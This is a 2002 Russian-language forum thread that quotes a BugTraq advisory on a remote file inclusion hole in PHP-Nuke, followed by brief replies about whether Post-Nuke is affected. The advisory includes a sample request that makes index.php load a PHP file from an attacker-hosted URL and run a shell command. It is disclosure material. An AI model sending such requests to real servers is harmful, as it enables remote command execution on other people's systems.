batva crazy administrator Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Цитата:   To: BugTraq Subject: PHP-Nuke allows Command Execution & Much more Date: Jan 17 2002 1:30AM Author: Handle Nopman Message-ID: <20020116183053.5335.qmail@hackermail.com> Hi All! I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code. The flaw is in the index.php's include file feature. It allows including files like index.php?file=file It prevents users including ..'s in URL's, but it didn't prevent users from entering http://-urls Remember the PHP's remote get feature... How to exploit: Upload this file to some free web space provider or setup your own server: Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al will execute ls -al command. I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies) Vendor status: I contacted the author on 28.12.2001 and he hasn't replied. Sincrely "Nopman"     Сценарий 'index.php' в PHP-Nuke имеет особенность, которая позволяет пользователям включать файлы. Из-за неправильной проверки ввода, возможно включить файлы, расположенные на удаленном сервере. Может быть выполнен произвольный код во включенном файле.     Как одно последствие этой проблемы, удаленный нападающий может выполнять команды на уязвимом сервере. Команды будут выполнены с привилегиями web сервера, в результате чего нападающий может получить местный досуп.     Уязвимость найдена в Francisco Burzi PHP-Nuke 1.0-5.3.1     http://securitylab.ru/?ID=28035     Всего записей: 12593 | Зарегистр. 07-01-2001 | Отправлено: 12:16 19-01-2002

Antuan moderator Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Не забудьте в версии PHP-Nuke 5.4 Final внести изменения, указанные - Здесь   Интересно, наблюдается ли подобное - Сабж. - в Post-Nuke? ---------- EuRuChess Всего записей: 10669 | Зарегистр. 10-04-2001 | Отправлено: 12:58 19-01-2002

ziv Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору А в Post-Nuke есть такая бадяга? А то блик сервак корпоративный, если его снесут, то и мне голову снесут Всего записей: 669 | Зарегистр. 04-07-2001 | Отправлено: 13:29 19-01-2002

voll Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору В 0.7 подтвердили - нет такой глюки.   Про 0.64 еще не до конца ясно. Всего записей: 656 | Зарегистр. 16-07-2001 | Отправлено: 17:13 19-01-2002

ziv Advanced Member Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору voll спасиба тебе за прояснение ситуации, вздохнем теперь полной грудью Всего записей: 669 | Зарегистр. 04-07-2001 | Отправлено: 20:26 19-01-2002

Компьютерный форум Ru.Board » Тематические » Системы управления сайтами » Выполнение любых команд + локальный доступ в PHP-Nuke

Переход по форумам  Закладки   » Компьютеры Цифровое изображение Программы Microsoft Windows UNIX Другие OS Hardware В помощь сисадмину Прикладное программирование Игры Форумные игры   » Интернет Web-программирование В помощь вебмастеру Графика Хостинг Зацените-ка!   » Тематические Ikonboard v.2 Ikonboard v.3 Invision Board Другие форумы PHP-Nuke и другие порталы Мобила   » Общие Спорт Флейм Темы по региональным встречам Музыка и Кино Юмор Литература и Живопись   » Ru.Board Новости Помощь по форуму   » Андеграунд eBookz Варезник Раздачи и акции Мобильный варезник Андеграунд Игры и фильмы   » Специальные Тестирование